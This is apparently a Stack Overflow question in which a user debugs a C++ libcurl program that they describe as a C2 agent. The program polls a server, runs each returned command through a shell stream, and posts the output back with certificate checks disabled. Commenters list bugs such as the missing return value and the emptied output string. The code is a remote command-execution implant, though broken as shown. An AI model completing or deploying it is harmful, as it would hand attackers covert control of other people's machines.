# variables in CURLOPT_POSTFIELDS c++

Tags: c++, debugging, curl, post, libcurl

I am attempting to pass something into `CURLOPT_POSTFIELD` and it either prints nothing if I include `c_str()` or `V\x1b{` if I don't.

I will be posting my full code for better understanding it is only 100 lines, the problem function is `curl_write()`:

```cpp
#include <curl/curl.h>
#include <iostream>
#include <pstreams/pstream.h>

int rad = rand() % 100000;
std::string agent_name = "https://127.0.0.1:443/agent/" + std::to_string(rad);


size_t curl_write( void *ptr, size_t size, size_t nmemb, void *stream)
{
  std::string cmd(static_cast<char*>(ptr), size * nmemb);
  redi::ipstream proc(cmd.c_str(), redi::pstreams::pstdout | redi::pstreams::pstderr);

  std::string line;
  while (std::getline(proc.out(), line))
    std::cout << line << '\n';

  CURLcode sendb;
  CURL *bnd;

  bnd = curl_easy_init();
  curl_easy_setopt(bnd, CURLOPT_BUFFERSIZE, 102400L);
  curl_easy_setopt(bnd, CURLOPT_URL, agent_name.c_str());
  curl_easy_setopt(bnd, CURLOPT_NOPROGRESS, 1L);
  curl_easy_setopt(bnd, CURLOPT_POSTFIELDSIZE_LARGE, (curl_off_t)line.size());
  curl_easy_setopt(bnd, CURLOPT_COPYPOSTFIELDS, line.c_str());
  curl_easy_setopt(bnd, CURLOPT_SSL_VERIFYPEER, 0L);
  curl_easy_setopt(bnd, CURLOPT_SSL_VERIFYHOST, 0L);
  curl_easy_setopt(bnd, CURLOPT_CUSTOMREQUEST, "POST");
  curl_easy_setopt(bnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
  curl_easy_setopt(bnd, CURLOPT_TCP_KEEPALIVE, 1L);
  

  sendb = curl_easy_perform(bnd);

  std::cout << sendb;

  curl_easy_cleanup(bnd);
  bnd = NULL;

  if (proc.eof() && proc.fail())
    proc.clear();
}

int main(int argc, char *argv[])
{
  for (;;)
  {
  
  CURLcode res;
  CURL *curl;
  curl = curl_easy_init();
  curl_easy_setopt(curl, CURLOPT_BUFFERSIZE, 102400L);
  curl_easy_setopt(curl, CURLOPT_URL, "https://127.0.0.1:443/");
  curl_easy_setopt(curl, CURLOPT_NOPROGRESS, 1L);
  curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
  curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
  curl_easy_setopt(curl, CURLOPT_FTP_SKIP_PASV_IP, 1L);
  curl_easy_setopt(curl, CURLOPT_TCP_KEEPALIVE, 1L);
  curl_easy_setopt(curl, CURLOPT_NOBODY,1);

  res = curl_easy_perform(curl);
  
  if (res == CURLE_OK) 
  {
    long response_code;
    curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &response_code);
    if (response_code == 200)
    {

      CURLcode ret;
      CURL *hnd;
      std::string s;
      
      hnd = curl_easy_init();
      curl_easy_setopt(hnd, CURLOPT_BUFFERSIZE, 102400L);
      curl_easy_setopt(hnd, CURLOPT_URL, agent_name.c_str());
      curl_easy_setopt(hnd, CURLOPT_NOPROGRESS, 1L);
      curl_easy_setopt(hnd, CURLOPT_SSL_VERIFYPEER, 0L);
      curl_easy_setopt(hnd, CURLOPT_SSL_VERIFYHOST, 0L);
      curl_easy_setopt(hnd, CURLOPT_CUSTOMREQUEST, "POST");
      curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
      curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
      curl_easy_setopt(hnd, CURLOPT_WRITEFUNCTION, curl_write);
      curl_easy_setopt(hnd, CURLOPT_WRITEDATA, &s);

      ret = curl_easy_perform(hnd);
      std::cout << s << std::endl;
      curl_easy_cleanup(hnd);
      hnd = NULL;

    }
    else { }
  
    curl_easy_cleanup(curl);
    curl = NULL;
  }
 }
}
```

I've seen other posts with similar issues, but I don't understand why this is not working.

BTW (`line` holds the output of dir for Linux).

Comment: How is this any different than [this earlier question](https://stackoverflow.com/questions/67410835/)?

Comment: BTW, you do realize that `std::getline()` clears the passed `std::string` before reading into it, so when the `getline()` loop reaches the end of the `proc` stream and stops iterating, `line` will be left empty when you pass it to curl.

Comment: So you think I should change how I get stdout? but idk understand why it prints it but clears it after, shouldnt the end of the loop happen after ```curl_easy_cleanup```, And this is different cause i showed more of the program I thought it would give more of a better idea

Comment: You did not show what `cmd` is being set to, or what `proc` outputs. But I do see some problems. `curl_write()` is not `return`'ing anything, so the actual return value is *indeterminate* and can cause curl to abort the operation. And `curl_write` is not updating the `std::string` passed in to it via `CURLOPT_WRITEDATA`, but `main()` expects that `std::string` to be updated. Also, `main()` is `POST`ing to the same URL that `curl_write()` is `POST`ing to, but `main()` is not posting any data. This whole code just doesn't make any sense. What are you actually trying to accomplish with it?

Comment: Its a c2 agent for my github , ive manged to do it in powershell, bash, python3  but not c++, The whole idea is to grab a number tell the server that number. Then get the command do it, grab output then return it. Pretty simple in things like bash, powershell but libcurl has been giving me a screw around. I know i was supposed to return, clear things but I am very very new to c++ and just thought if I could learn powershell this way.... none the less thanks for the help anyway

Comment: "*ive manged to do it in powershell, bash, python3 but not c++ ... Pretty simple in things like bash, powershell but libcurl has been giving me a screw around*" - then that should be a good indication to you that the logic you are trying to use in C++ is wrong. If you show what those other scripts are doing, someone can tell you why your C++ code is not working the same way.  But off-hand, my gut is telling me that having `main()` and `curl_write()` request the same URL with different inputs is contributing to the problem.

Comment: @RemyLebeau Ok thanks I will look into it!